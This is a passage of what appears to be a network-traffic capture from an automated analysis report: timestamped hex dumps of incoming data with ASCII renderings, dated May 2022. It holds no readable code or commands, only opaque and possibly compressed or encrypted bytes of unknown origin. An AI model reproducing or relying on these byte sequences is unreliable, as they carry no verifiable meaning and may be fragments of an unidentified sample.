80 55 b8 ee 77 22 a3 b3 8d f4 3f 41 ce 7f 66 8f 5e f3 Data Ascii: iOw2u*."/>UflW)A#h$[EWk,+b(nuiRCby.0'Sn{_zb][y-DVdjw0s>t={\[kx8bK @ZTCVX:xuPU1KTUw"?Af^
2022-05-30 12:45:59 UTC	535	IN	Data Raw: f7 e0 10 36 09 05 ee 73 86 15 1f 77 fc b5 2b 58 b9 37 7c 71 b1 ca c6 d1 d7 d9 3f 0d 92 5f 00 95 3c 33 bc 9b 8a 6b 25 e9 fe c6 27 6b b2 22 b9 53 a8 c2 68 24 4a 4f eb d5 5f 9b 9c 01 3c b0 e6 a4 cf 53 0c 2f 76 26 16 c4 37 5b 08 f8 98 0b a4 9e e0 9d c8 9c c3 24 7e 37 50 66 13 1b 13 b3 67 26 49 6f 28 55 0d e5 ab 30 e7 97 c5 9f fe c9 c7 74 f7 dd 6d 3d 28 f6 f8 82 a0 32 0c f3 f6 81 5b 9f af a9 de b4 3e 81 14 51 b8 d7 67 e3 64 64 c5 08 f6 07 7f 71 18 62 05 ec 37 b1 40 c3 89 7f b7 a6 21 b3 ef 32 29 f6 60 81 ad c3 c1 71 e4 16 63 39 68 3e 49 8a 12 b4 89 71 c7 49 c2 db 18 45 c7 89 54 c3 0e db e1 22 53 5b d9 e4 11 89 c4 0b 22 72 dd fb 52 47 6e 3d 61 88 00 85 51 88 2a 39 3e 0d 15 6e aa ee d5 06 f9 e3 6b d4 fe a3 38 1e 7e 23 f5 30 3c ca 7d 01 65 a1 d5 c7 a9 f3 4d 66 10 Data Ascii: 6sw+X7\|q?_<3k%'k"Sh$JO_<S/v&7[$~7Pfg&Io(U0tm=(2[>Qgddqb7@!2)`qc9h>IqIET"S["rRGn=aQ*9>nk8~#0<}eMf
2022-05-30 12:45:59 UTC	536	IN	Data Raw: b5 fa 4f e1 2a 90 90 e9 f3 9f bc 2c db c7 4e 90 dc e8 97 b8 2a 56 e9 9c 3f 4f 15 67 ee b7 b1 03 9c 0e d0 55 2c a2 98 ca 4c 4b 12 57 18 9f bd f2 c3 88 b9 b3 0e fc a5 15 4f ee c9 80 28 a5 6c 4b d8 97 8a 75 e5 be 3f 97 9f 9a 86 56 6e 6b 7e 7e dc 47 95 72 f7 30 c8 ff f8 a6 79 cb 49 df ed 2b a6 b1 6a 7c e3 5a bf dc 90 9d 94 7a 8a 59 ff 08 9c dc cd 39 9d f5 27 3d 20 5a 48 20 ce 2e df 8d c8 dd 97 44 e4 55 d8 65 62 d2 a2 62 01 b8 46 b2 b9 06 b2 cd c1 03 96 c1 72 91 3b b0 d0 1c 81 53 4e 62 82 f8 47 9e a7 94 f4 2d ce 6f 85 95 c2 75 9c 56 17 05 6a c2 49 3c 29 f4 49 64 af a1 69 45 02 f8 c3 91 9c 39 83 28 13 3c 37 cb ea 2c 2b 33 7d b0 8c 3f a4 cd 2c 39 5f 48 de 26 18 9c 76 f9 c7 96 91 4e 93 fe 21 cd 22 57 cc e8 62 28 70 42 ee e0 b4 ea e0 e0 63 a8 91 4d f9 f7 1b 73 3c Data Ascii: O,NV?OgU,LKWO(lKu?Vnk~~Gr0yI+j\|ZzY9'= ZH .DUebbFr;SNbG-ouVjI<)IdiE9(<7,+3}?,9_H&vN!"Wb(pBcMs<
2022-05-30 12:45:59 UTC	537	IN	Data Raw: fa e0 5a d9 51 6c 4a 9c 71 ff 53 52 23 cf ca 67 97 8e f6 6b dd 2b 82 54 30 00 dc 01 c4 fb 6a 14 6a b9 d7 72 9d 0f ad 87 21 32 c4 e3 db 1c 6b 1f 29 b4 b7 f4 b3 64 97 11 5b 9b ca b8 17 ed 66 e9 ae 44 23 60 99 1f e8 6c 86 80 b4 4f 0f cd 47 f2 09 3a 57 5f 8f a5 66 e0 1a 2e 19 a8 12 7c 35 72 b2 67 6b b8 df a7 44 78 bc 75 44 73 58 aa ea 97 76 b4 b0 5c 48 28 53 f5 42 28 03 cc 55 c5 99 7b 1c 4b 2a 65 b9 c6 67 ef 78 a8 51 10 3d c9 c5 69 fa 03 67 ad 2d 16 84 d6 66 ee d4 9e a3 1a 26 8c 78 ba 08 83 4e cf 68 b6 69 82 8c 1b d3 ad ce fa b5 1a 56 2f 39 c2 de 54 bb a5 5e 89 03 5a eb b4 9b 78 bf 76 c7 5b ef 53 19 dd 3e 84 87 ac de eb b8 37 ff 07 b7 fb ff 25 f9 62 70 9c c9 a8 2d cc 86 a1 ee e2 db 2e cc 61 5d 4f b1 f8 9b 77 0d ce 42 bf e2 6b 3c 05 b3 aa b9 48 d6 0d e3 3f d1 Data Ascii: ZQlJqSR#gk+T0jjr!2k)d[fD#`lOG:W_f.\|5rgkDxuDsXv\H(SB(U{K*egxQ=ig-f&xNhiV/9T^Zxv[S>7%bp-.a]OwBk<H?
2022-05-30 12:45:59 UTC	539	IN	Data Raw: a4 4f e8 4f e6 90 f3 39 14 20 dc f4 ef e5 7d 84 d0 64 7d 82 74 93 66 21 cb 13 3f ab a5 17 d7 eb e5 88 cd 6e 67 1a 53 fc 6c 19 4d 0e 3a 1f 50 ba 94 bd c9 46 fe ab 4d 09 37 c0 35 78 63 28 1a c5 a3 bb 25 bf 25 c3 e2 38 82 ac 29 e3 58 8f e1 94 eb 53 11 f5 01 6c 86 31 8c 4e 1e 4f 78 ef 17 58 74 2b f6 22 3a 77 26 b8 25 fa 0f 9e c6 eb 77 2c b3 3a 7a ed fa c0 46 52 9a 3b 7c f7 a2 b2 1c c0 33 03 50 d9 58 61 11 13 86 d8 4e 02 9c c4 da eb 31 3c e5 eb 47 e8 7f 55 37 a1 cc 75 3c c1 6e 28 e2 b0 32 7a 42 91 10 b1 54 c5 89 1d a6 85 87 c7 4c 76 9d 04 29 d2 4c e6 6d 08 f6 8c e6 02 e7 27 3c 91 d0 20 fb f9 eb d4 35 21 a4 38 28 7a 7a 9f 28 bc d7 eb f5 8b 44 c4 c5 9b ff 88 d3 82 42 89 45 e7 6f 63 fe 9f af 6d aa c2 39 69 a0 85 9e 6d 92 8b 1f eb 65 2e 51 3b 8a a9 50 92 c8 fb 59 Data Ascii: OO9 }d}tf!?ngSlM:PFM75xc(%%8)XSl1NOxXt+":w&%w,:zFR;\|3PXaN1<GU7u<n(2zBTLv)Lm'< 5!8(zz(DBEocm9ime.Q;PY
2022-05-30 12:45:59 UTC	539	IN	Data Raw: 6e ae ee d9 3f 54 a3 69 c8 03 d0 46 43 0f 5a cc 12 bc fe d1 79 9a f6 67 3a 3a 50 9e ba f6 c3 2a 1b 0e 62 07 65 8f f2 69 ec 15 0f eb 36 cc f4 df 2d 18 8f 72 1a 2c 98 77 11 0f 1b 15 4c d1 48 ee b6 62 7b 5e 75 00 67 93 f8 c5 9e 90 54 aa c3 12 4a 27 7f dc 45 e9 31 df a9 6f e0 d3 56 da 5c 01 78 16 29 6e f6 37 5b 39 51 8b 24 67 fe 6c 13 01 bc c6 6a 1f 0d a6 d3 28 f4 94 1f a1 d1 60 9a 71 e1 86 86 1a 75 41 02 6a 29 a4 af bf e4 55 12 80 ae b9 16 31 81 cd 0c ae 38 bd a8 bc 80 6b 05 f1 74 98 57 cc 02 ae 9d 63 e7 fe 55 02 2c 24 1e 12 b6 72 14 e7 72 71 e1 f7 16 17 a3 08 85 33 83 15 fe 00 00 06 24 84 7a 59 5d 56 df 1a 18 e2 4a 4d 85 bd 90 10 b0 37 26 fa 85 66 7e f5 74 ed c2 01 dd e1 2a 38 f6 2d 5d 46 be de e9 d7 2c 41 85 89 04 5d df cf e2 88 37 37 42 17 84 b6 7a 3e 9c Data Ascii: n?TiFCZyg::Pbei6-r,wLHb{^ugTJ'E1oV\x)n7[9Q$glj(`quAj)U18ktWcU,$rrq3$zY]VJM7&f~t8-]F,A]77Bz>
2022-05-30 12:45:59 UTC	541	IN	Data Raw: 93 d7 ff 23 60 b5 11 48 5d cb ea 22 38 67 ba 79 73 08 4e 6f d9 78 e5 75 46 8f f8 7b b9 b0 0e 6e 87 ea b0 3d ba b4 b5 78 1b b4 4d c3 69 63 6a f6 3b 19 15 56 0e 18 39 41 bb 33 70 ed f6 88 1e ab be 79 28 4e 18 c1 16 81 35 64 57 68 69 b0 4a 38 bb f8 43 9d 1b 16 a1 53 63 08 03 63 31 fb af f4 b7 b7 20 5a e7 a9 46 ae d9 bf 77 c9 ae 92 34 88 9e 65 16 09 fe 3e 1c 47 39 de c4 02 1c 7c 99 88 7a fb e6 5c f0 f4 1c fa 1d 91 b0 ff 95 10 f0 b2 94 3b d9 7d 77 54 7e 82 10 3d 15 42 40 66 06 1a e2 de bc 7e 92 21 89 29 2e 98 02 6d 49 37 21 cd 86 2a 98 f2 df 5a 59 45 c8 41 ce c4 d1 d8 e5 70 45 c6 48 2c 48 35 64 f3 5e 92 00 ce 1c 02 34 36 6a 1b 48 84 7c a6 ef 6f 09 81 35 4a db 4b 42 44 9f 69 33 9a 55 b5 0b f8 5d 1f ca bf 9a 8e 69 03 48 ed a0 fa b4 65 fa 58 b9 00 45 44 1e 33 93 Data Ascii: #`H]"8gysNoxuF{n=xMicj;V9A3py(N5dWhiJ8CScc1 ZFw4e>G9\|z\;}wT~=B@f~!).mI7!*ZYEApEH,H5d^46jH\|o5JKBDi3U]iHeXED3
2022-05-30 12:45:59 UTC	542	IN	Data Raw: 77 37 91 a6 46 09 f8 5e 75 bb db 04 c3 19 e9 c3 7f 5f cd b0 3f a9 83 f7 a8 bd 93 6b 65 b7 f2 c8 a6 19 2d 20 65 4a 74 34 70 5f 19 c9 76 f5 5c 7f 84 cc 49 6f 4f b7 f4 2a 47 86 d9 4a f8 c7 e4 3a 55 2b e5 90 95 cc e3 e8 e3 49 ce 5d a6 bd a7 13 74 1e 87 db a4 ef 56 dc 9d 7a 65 7b 72 61 b8 ac ac 71 43 d1 0c df ab 92 e3 ca 1c 4b 25 f8 72 7d 13 0d af 3f 9d 54 92 25 c3 2b 36 11 99 52 d2 75 65 e5 89 9a 91 81 c3 1e 33 05 34 15 d8 52 aa 95 40 c2 d6 cf f4 18 65 e9 9d 12 38 4e 72 cd f6 28 22 96 ad c8 b6 f3 3c 05 90 e0 16 f4 9b 3d 93 7f f3 30 de ee d5 f0 76 1c e2 68 e4 13 76 d8 5b 03 18 0f dd 46 7d 18 99 94 4b 68 29 2d ca fa 50 ad ac fa 4c 4e 59 9a 09 4f 86 96 38 b3 1b e3 13 75 58 a2 b2 78 06 f9 e3 3f a3 c1 33 e7 f0 a7 a9 3e d9 a0 09 bd e8 22 bc 2a 8a 49 ea ee 6a 97 31 Data Ascii: w7F^u_?ke- eJt4p_v\IoOGJ:U+I]tVze{raqCK%r}?T%+6Rue34R@e8Nr("<=0vhv[F}Kh)-PLNYO8uXx?3>"Ij1
2022-05-30 12:45:59 UTC	543	IN	Data Raw: b0 dd 39 c6 f0 6a e4 5d c5 5c 82 8a c8 d5 19 b4 21 46 15 52 bb da a3 d6 dd ff 3a 86 9d 7f 01 ce 45 82 12 3a 2c d1 d8 9a 80 2a 1a 44 a9 fe d2 73 58 4c 23 44 0a 39 b8 fe 1f e2 4d e8 40 39 62 e2 d4 07 07 fd 4f 83 a4 94 3d 64 21 05 42 0d 6b fe cd 48 dd 81 b2 9d 69 3e 3e 41 ce aa 64 8b 8e b2 c5 51 51 05 53 83 93 bd c1 84 14 09 80 13 58 ad 6c 5d 9e 9e 53 62 7f aa ef f8 33 a7 7c 8c 98 04 06 a9 45 1b b1 e3 18 95 fc e7 08 ee fb 73 eb 46 b8 c4 65 4e c6 0a 35 16 38 7d c9 33 29 57 e8 58 82 b6 15 72 43 f4 88 57 dd d1 4b 7a a5 ac 2f 86 bf c2 25 de 8b c8 10 84 96 08 67 f4 97 ae 0a 1b 62 f1 a6 64 01 5f b6 4f b7 72 ba 2b 50 49 b4 2a 85 a0 91 11 05 95 c7 18 f8 90 e0 33 d8 ff 14 a1 de e6 c4 dd 68 c9 2f 9b 1f ee 9a 55 e5 bc 42 41 7d 58 d5 ce e0 61 c4 d9 46 6e 4e d5 1d 3d f3 Data Ascii: 9j]\!FR:E:,DsXL#D9M@9bO=d!BkHi>>AdQQSXl]Sb3\|EsFeN58}3)WXrCWKz/%gbd_Or+PI3h/UBA}XaFnN=
2022-05-30 12:45:59 UTC	545	IN	Data Raw: a6 79 cb 7c 8b 3b e5 e7 bc 56 b1 a2 5d ca 15 51 16 56 82 45 5f b3 77 94 b4 fc 36 61 f4 c4 ff 20 5a 33 e4 a7 97 be 80 c8 af 8c 36 64 52 af 9a 16 45 1a c5 d9 90 ff e3 da ee 7b 83 66 71 24 8e 76 43 bb 0b 0b b1 4c ee a7 6d c9 07 b8 7d eb d4 c6 24 ab 92 79 82 02 10 15 42 40 60 98 56 3b 8e c3 69 76 eb b8 3e 6a ea 44 0a 15 bf ac 21 c9 0a 67 0d 52 47 31 3b b0 b0 ce 6b 09 2c 81 4d 5f c8 5f e2 3d 9e ea 3e 8e f7 a6 aa e3 fd 48 1a 75 94 8a 23 e1 1f 9a 9b f1 97 56 5e 7b ea 4f 92 59 40 86 40 5e 4a a1 f8 61 11 63 c7 21 23 23 ab 34 58 e8 fc e0 ad fa 58 da 0d 33 53 01 a3 21 a2 5e 39 34 40 6f 1c 73 bf 2b 39 15 a1 62 9f 54 a5 48 96 90 11 1f 6e 05 5b ce 94 1e e8 68 31 ea 2d 98 0b a2 49 fe f6 a6 ca 8b 30 f1 d8 c5 55 36 8e de 7b 02 f4 96 78 fd 27 24 66 02 8f 97 ab bd eb d9 42 Data Ascii: y\|;V]QVE_w6a Z36dRE{fq$vCLm}$yB@`V;iv>jD!gRG1;k,M__=>Hu#V^{OY@@^Jac!##4XX3S!^94@os+9bTHn[h1-I0U6{x'$fB
2022-05-30 12:45:59 UTC	546	IN	Data Raw: 29 26 17 72 02 15 5e 31 c8 28 bc cf a7 54 f6 b8 3b bd 07 22 eb 46 cd 5f 44 cc ba a0 71 39 7c 07 79 05 48 fa 8f 9e 35 57 eb c0 8d 73 3b 1b e8 f8 09 a0 04 4e 35 57 af ed 36 12 9a 3a b4 de 0d 89 35 4b 98 ab 1a 1a ed 33 96 ef 45 81 23 a8 84 5b f0 7f 5c 82 67 34 86 1c 62 9a ff b5 f3 c9 1c 8d b2 92 05 3c aa 3f 59 9a f5 f3 d9 a3 97 12 df a2 06 a1 c7 13 a8 cf 9f 1a 20 89 de df cf 5a 26 56 b6 11 14 ea 7f 39 67 e1 f5 41 36 00 83 ba d4 a2 b0 59 c2 e5 4f 86 45 03 78 1d b9 bc 15 b0 dd 44 6f a8 6d d8 d0 c7 bf 17 17 f0 cd a1 e2 f9 e8 32 3c 17 a9 f0 02 21 55 98 9d 1e b2 75 f8 cf 27 ae 15 24 75 32 f8 22 c4 28 59 6b 71 ce 0b 79 a1 f9 3f 96 87 6b 71 86 8e 3c 6b ae f9 da 49 26 9c 02 cc 70 d2 1f b2 4f 70 6d 1a 9d a1 86 34 9d 49 5e 04 4b 13 56 f7 b9 38 b3 f8 7b 41 5e b6 a1 82 Data Ascii: )&r^1(T;"F_Dq9\|yH5Ws;N5W6:5K3E#[\g4b<?Y Z&V9gA6YOExDom2<!Uu'$u2"(Ykqy?kq<kI&pOpm4I^KV8{A^
2022-05-30 12:45:59 UTC	547	IN	Data Raw: 54 6b 97 ca 9b a8 9b fc e5 80 55 6d 7d 87 8d 9c e4 6c da 3b 68 30 c0 2a 7f ce 84 39 01 93 c1 51 64 0b cb 87 ef 7f c7 24 1e 54 a5 63 5e 24 cf 4a 2c f7 9c 82 08 59 b9 47 3e ed 9f fd 0c f9 dc c0 b6 ee 4a b7 02 1a 97 0e 11 f8 6d 38 af d2 c5 e6 87 b9 76 e4 62 fd f8 c6 fe 28 7f 61 5e 93 82 4d 00 72 dc d2 51 73 2f 0f a1 dc bc 60 6c 14 7d 39 87 b7 30 ac 2b 76 a7 18 b8 28 9f 2e 8a 6b f0 a4 8f 8b 33 1f d6 ab 2d ba 2b 50 bf 64 d6 37 b8 e5 1f 7f 16 a2 91 46 a4 45 0f 74 57 37 45 92 50 88 22 1a 01 2f 27 77 dd b2 7b e3 5b 1f 09 f0 50 fd 93 36 37 f5 28 40 6b 75 3c 42 86 71 8d 4c db 89 1f af cb 67 62 f9 73 e6 57 85 54 17 af 09 77 72 9d 86 43 69 fc cb 2f e1 06 80 0d 5d d5 3b b2 41 57 de 1c d3 e2 ca 4a b2 50 c1 68 35 6b 65 03 64 4a 66 5d 3e 05 c7 c6 74 9d 7f cc 36 f0 20 66 Data Ascii: TkUm}l;h0*9Qd$Tc^$J,YG>Jm8vb(a^MrQs/`l}90+v(.k3-+Pd7FEtW7EP"/'w{[P67(@ku<BqLgbsWTwrCi/];AWJPh5kedJf]>t6 f
2022-05-30 12:45:59 UTC	548	IN	Data Raw: 80 18 3d 91 5a eb 80 bd 47 26 b9 86 05 e4 52 d2 ba dd 75 17 e5 0a d1 64 89 d6 a6 28 4b 0a 8e 8e 6f 4a 77 9e ed f4 47 39 d9 dd 46 f3 20 0b f5 0a b1 6a a9 99 31 94 8b 24 8c 4c ec c6 a0 1d d0 11 ee 65 e8 ff e2 cd 88 c1 f4 94 f7 52 01 d1 d7 d9 9b 4b 60 66 00 03 d0 31 07 f4 10 ad 1a 7c 49 30 b3 07 f0 11 7a 63 e5 50 f2 bc 8b fa 47 ba 55 b5 c9 74 b9 88 36 b8 56 2a 18 28 08 db 10 bf 90 78 a3 73 c3 2a 4c dd 7d 10 52 1e e7 96 1b dd 0f eb 37 5b fc 8b 47 f0 14 4f c6 2c ec 04 16 70 2e 11 67 bb a3 7c 8c 70 b7 fb 57 47 99 7b 8f c6 f4 90 8e 61 9e 58 d6 b0 f6 e4 47 ac d9 c9 62 1b 4b 74 9a 49 1c 98 d1 8a 9f 59 e1 ef 48 9e d2 02 23 61 fa 29 41 3c e3 f0 d8 54 75 d2 a0 4b 7f aa 38 eb 90 96 53 11 d1 88 4c 83 50 f8 17 6a 3b 6a 64 dc ac 9f 6d 85 da 96 75 41 05 8c 18 7c 66 00 18 Data Ascii: =ZG&Rud(KoJwG9F j1$LeRK`f1\|I0zcPGUt6V(xsL}R7[GO,p.g\|pWG{aXGbKtIYH#a)A<TuK8SLPj;jdmuA\|f
2022-05-30 12:45:59 UTC	550	IN	Data Raw: b7 d6 a7 fe ca 61 9d f7 b2 03 4c 9e 52 0f 03 c8 d8 56 62 22 7a 6d 8d f4 d8 36 bd 58 ad b3 59 f2 3c ef 0b 23 dd 78 34 35 7b 46 34 27 a2 7d ea 7b 89 e2 fc eb 2a fb a6 ab 6d 14 fd b9 35 a6 07 26 12 d0 ac de 86 22 22 45 a8 95 17 55 95 a7 4f 03 e0 4f 29 ac fe eb 59 87 99 25 a6 5d 39 58 bf 50 e2 3e d1 05 7d 2e 7b 68 41 28 e9 b6 ca 48 20 ca e4 13 00 a2 37 08 76 b4 fe 34 5b 8f b8 f3 b7 bf da e7 18 36 5a 7f 77 e6 fe f4 ad 5d 7c b3 4c 6c 8a bb 86 4f c2 6a ae f9 c4 2a 59 7c bf 12 df 47 9d fb 13 d7 ad ea 3e a3 00 13 50 81 b7 2b 8f 84 55 b5 00 b5 17 a3 a9 e8 2a 15 c4 9f 46 1f b4 10 18 8f e2 f0 be 44 13 f5 8b a7 c8 39 15 f2 7a d6 29 bf d7 83 9e e6 2d 2c c7 31 ad 2d b8 0b 1a 30 a4 83 c9 94 95 33 d8 89 dc f4 79 71 f5 86 57 57 3a 07 cc c5 e6 89 44 cc 2c 8c 4a 95 64 94 3a Data Ascii: aLRVb"zm6XY<#x45{F4'}{m5&""EUOO)Y%]9XP>}.{hA(H 7v4[6Zw]\|LlOjY\|G>P+U*FD9z)-,1-03yqWW:D,Jd:
2022-05-30 12:45:59 UTC	551	IN	Data Raw: 40 2b a3 e7 87 63 44 7e 42 eb 38 de 33 4e 46 a5 77 f3 ed 5c 36 49 16 af 2f 71 3c 59 ba 65 aa fc 21 fe 7b 2f 93 08 5d e8 2b 6c 14 6a 9e dd 8b 42 b1 84 b6 7a ff 6c 2c 14 f5 76 cb 80 7f 64 2d cc eb 4f ce 65 be 2b 50 d4 42 c1 0b 11 37 65 2a 6d 5a 91 89 9b e4 24 64 04 9e 52 6f 88 5a af 1a 65 d2 8f e2 34 6f 0f 91 a6 46 09 f8 5e b4 ab 4f 13 7e cd 31 38 d9 2b 44 b6 a3 00 42 53 79 6b 93 7c 96 3f c5 df ea 8a 02 52 63 f8 03 03 67 fe 5a cd 89 87 49 d0 1c c9 80 37 a0 a0 0f da 95 37 ab f9 85 2c dc 4c cf 40 e6 e2 26 00 74 03 ee a1 68 29 fb bc 0e 2f 88 e1 78 db 53 b6 56 dc f7 38 86 36 be 2e b4 d7 ac 96 d4 23 77 fb 87 18 75 7f d5 b3 ca 72 8c d3 ce 13 0c 82 81 df c9 50 c3 53 ee 36 66 ba 65 9e 2f 0d 2f ee cc 98 6a 32 cf fa cb 76 2a b9 f5 14 19 49 82 82 0d 28 15 9a 46 22 a3 Data Ascii: @+cD~B83NFw\6I/q<Ye!{/]+ljBzl,vd-Oe+PB7emZ$dRoZe4oF^O~18+DBSyk\|?RcgZI77,L@&th)/xSV86.#wurPS6fe//j2vI(F"
2022-05-30 12:45:59 UTC	552	IN	Data Raw: 92 52 2d e2 fd 08 56 a1 dd 75 57 7f 08 4e 71 83 ed 8b c7 3c 56 f7 4a e6 72 91 63 89 c7 78 19 b3 17 e1 74 12 33 8e ba 35 fe 33 8d 38 85 53 a6 cd 9c fa 67 ae 2c 6c 4b 76 ca 39 bf 90 c8 6e 8c d6 9e 59 1b 9d 9f 94 39 5f df 81 07 e8 89 d8 52 77 50 3e 93 8b 30 dd 2b e6 18 41 16 a5 7d ce db 6c 11 29 62 18 9a 5e a8 15 3d 83 e9 76 6b 27 90 24 66 f0 6b 1c b9 ab ab 9c 42 07 1c 3b d0 ba c2 d7 25 b5 11 45 b2 63 37 d9 65 a0 07 00 6c 3a 5c 44 dd db 23 b7 39 ec a6 84 7f 5b 69 c3 f2 6b 9f 94 d9 dd 35 68 70 43 07 89 f6 28 c7 d8 a7 9a 88 6e 93 3d e4 7a 6a 44 cd 0c f7 ea f5 38 5b ae c6 04 f1 06 3d e3 8d ea 8e 41 2f c3 6e 32 97 0f db 62 6f 16 9c a2 e8 1d 51 cc 08 e9 95 73 bd a6 b8 4b b3 e3 76 33 09 2e 5f 51 49 b5 7b 26 1a c3 bf ee 88 c4 bd eb c5 d1 24 0b 46 7e f0 f3 34 1c 8d Data Ascii: R-VuWNq<VJrcxt3538Sg,lKv9nY9_RwP>0+A}l)b^=vk'$fkB;%Ec7el:\D#9[ik5hpC(n=zjD8[=A/n2boQsKv3._QI{&$F~4
2022-05-30 12:45:59 UTC	553	IN	Data Raw: 54 de ab ca 12 84 30 17 21 b4 14 ba fa 1e 4f 7c a6 0a 26 96 e2 7b f9 48 c8 b2 78 f4 07 e2 3f ad b9 0f 9c 3c f7 41 9c fd b6 ca 7a 58 f1 7e ea 16 a6 3b 9d b1 c0 3c bc 1a 31 46 e5 16 7c 32 7b 58 78 76 53 4f e6 ff 97 53 df f9 b4 39 5d ea c6 5d 2d b6 d8 75 62 41 49 f6 7d 03 cc 9f 00 cf 79 03 04 ca 3d 10 13 93 35 e9 3f 66 71 05 ec 22 0a ae 98 ec 23 ac 47 5e 88 a1 12 ed 08 03 6b 0a 68 ea d0 f1 f7 c2 0f a9 2f 32 b3 e3 97 f3 c9 3f 05 e6 98 75 62 01 a7 a1 82 a6 2d e6 68 fc 20 2e 69 66 03 3a 2a 7f ca f6 f4 7f f2 e9 b8 59 50 3b 11 f1 1f 6b c4 7f 31 e6 15 f3 6a 84 cf 3b fb 10 05 1a ea 49 3c aa 20 c8 aa 47 f2 e8 37 b1 b6 d2 93 af 41 de 5c 52 b4 df e2 56 3b 2a 41 b2 78 9c ea 81 f5 eb ab 4b e3 aa a0 99 f5 c2 5e 07 2a cd ea 49 0d f9 53 9d cc 5b 1e 10 3f 94 f9 4c 88 84 4c Data Ascii: T0!O\|&{Hx?<AzX~;<1F\|2{XxvSOS9]]-ubAI}y=5?fq"#G^kh/2?ub-h .if:YP;k1j;I< G7A\RV;AxK^*IS[?LL
2022-05-30 12:45:59 UTC	555	IN	Data Raw: 89 c0 14 a0 b8 e8 c4 f4 ee 91 fb ae a3 92 95 8a 71 8f 8f 62 00 32 52 23 9b c9 67 97 fc ee 7f 99 f1 5c 0b 6e 33 12 7d 3d af 7a da b3 67 71 73 e9 29 36 95 58 3d 25 06 37 e0 90 8c 2d d1 3c c3 2f b4 f0 44 d2 5a 11 25 bf 88 de 16 5e 8c b9 29 9d 17 e8 6c e5 20 5b a0 0f b1 54 61 d9 52 f8 9b 87 0d aa a8 5c 1d d9 82 f0 b9 59 86 77 a2 c3 ba 93 7c 8b f7 18 30 42 f8 9a f8 23 ff 72 ab 60 02 6f cc ad 81 8c e8 60 33 34 6d 5a a1 d5 23 12 99 f8 cb 70 04 17 83 27 df d1 35 1d 42 ec 36 12 84 59 55 38 f0 c8 9a e3 fc 41 3b 32 05 b9 da 34 9a 39 30 10 91 df 43 a4 14 61 39 9d e2 b1 12 56 2f 5a ea d5 69 ba d1 69 e4 e6 b0 91 cc 16 2c 9b dd 18 b7 1b b6 1e f9 2a 56 78 70 c7 6f 60 62 73 53 93 60 22 55 fd cd b5 fc f1 68 7d 59 f2 12 35 8e 74 77 00 94 15 4d b1 13 9f 49 86 39 2f 8e fb 90 Data Ascii: qb2R#g\n3}=zgqs)6X=%7-</DZ%^)l [TaR\Yw\|0B#r`o`34mZ#p'5B6YU8A;2490Ca9V/Zii,*Vxpo`bsS`"Uh}Y5twMI9/
2022-05-30 12:45:59 UTC	555	IN	Data Raw: dc 5b c0 69 c8 df 1c c3 03 54 64 21 8b 30 64 2b c6 f6 72 b8 3f fa 34 61 6b 04 3c bf 34 46 3b c2 43 fc 63 82 22 78 84 e6 a4 63 2a ca de b0 3f 49 30 9b e4 47 ef e8 31 e8 c9 fc 75 12 1a fd 0a f0 1d dc 5a 5b 86 3b 5a 7d d7 5e b5 bb f3 ed 81 25 fe 16 63 2b e2 d4 64 8e cf 1f 04 52 1c 6b c3 c3 b9 de 91 0e 55 d7 ed 9c ff f3 2e 90 4d 88 37 78 ef 7f 49 94 4d 0a 5c 35 f0 bf f4 5d 40 ee 94 46 f2 3e c1 38 02 96 15 b8 73 ce f2 a0 ce 4a 05 19 7c 7c f7 da 9f da 95 fa a9 23 c4 b3 db f7 17 fe a0 0d b2 80 f8 ab 40 ec ba 71 5b 0d 08 87 09 ce 71 3b c1 9b 3b 95 b2 10 e6 22 a7 15 10 c9 99 38 d2 10 9c d6 62 8d 1c f4 19 c1 b9 cd dc a1 f2 44 f5 bb bf d7 6e 4c c5 0c 82 64 34 86 1c 5a f9 f3 5a e9 d6 69 ba d1 69 e4 e7 b7 91 cc cb ca 8f 70 df 5b db 30 7e b6 2a 0f a2 05 8a 44 c1 fb 11 Data Ascii: [iTd!0d+r?4ak<4F;Cc"xc?I0G1uZ[;Z}^%c+dRkU.M7xIM\5]@F>8sJ\|\|#@q[q;;"8bDnLd4ZZiip[0~D
2022-05-30 12:45:59 UTC	557	IN	Data Raw: 01 c9 da d7 68 ce fe 47 14 5d f8 b4 a7 cd 33 fa b4 f9 d1 93 a6 76 2d be 7e 90 91 3e f0 2f 32 96 1b 95 99 15 9d 5f 70 b0 07 e8 08 6f a4 88 af e6 95 6f 4c c6 2c 8f 3f f5 e8 5a f0 16 67 c5 28 92 dc e8 d6 56 ff 70 81 b6 b9 9e 18 92 91 56 d4 0e 25 e2 21 46 16 89 aa 23 4e e1 af 39 2e cf 40 63 5e 30 b9 59 a2 bb ec 68 7b 74 0c af 82 ba a9 bb c4 3b 90 09 4e d4 f2 46 39 53 65 4a 9e e8 be 15 07 75 72 ed 61 ee c4 80 76 ef 87 ef b9 05 23 c9 97 01 17 e4 5b 0c f7 61 b4 e5 bb fb c9 05 e6 e9 79 38 32 8f e3 c0 a4 33 3e c5 4a f1 24 6c e6 9e 4f 22 3a 64 3e 4d 45 49 72 9f f1 53 47 c6 b0 e8 60 60 db 57 37 dd b7 4a 3c f5 60 11 05 6b a0 7a 42 eb 5d 48 6d b1 b9 0a c8 d3 73 c7 36 3b 64 2a 5d 2a 38 60 40 d7 fb be de 01 ca f3 4f 7a 2f d9 9d 9b 03 ac bd 20 8b e3 63 ea 3b 34 27 33 3b Data Ascii: hG]3v-~>/2_pooL,?Zg(VpV%!F#N9.@c^0Yh{t;NF9SeJurav#[ay823>J$lO":d>MEIrSG``W7J<`kzB]Hms6;d]8`@Oz/ c;4'3;
2022-05-30 12:45:59 UTC	558	IN	Data Raw: 57 1b a5 9a 75 d3 4c 35 7b 53 15 7d ea 16 46 8a 61 4e bc dd d0 84 21 11 85 59 87 b9 26 ee 9b 4d ce 4f 6d 31 f4 ad 3c 73 a3 31 f6 fd 73 86 e0 07 6b ae f9 da 28 dc 78 15 26 1c 47 e1 b4 fb 02 be c3 07 91 91 ce 17 81 b6 23 0e 10 56 2c 3c 8e 00 23 da 53 dd c5 76 d2 8a e3 14 ee db 8f 9e 97 ae e4 d0 64 9a 6a 63 38 dd 97 c5 1e 3e 05 01 8f 40 8d 06 20 b5 83 d0 4f 32 a6 3a 45 5e ba 12 b1 85 cb 9f 00 81 7f b9 c8 65 e7 42 af c4 f8 47 4a 35 9f 0b c1 7b 1d b1 6a c2 6a e2 42 65 05 25 4f 8a 3c bc eb c2 c0 47 29 a3 b5 ff 92 0e af 44 9b c3 28 98 79 2f 81 67 02 3e 56 2a 94 84 61 66 67 8e ca 92 2e 87 f1 5d 26 81 39 fa f9 48 26 b3 fd 30 cf 51 d8 3a 22 2d 6b 7c 43 f9 be a0 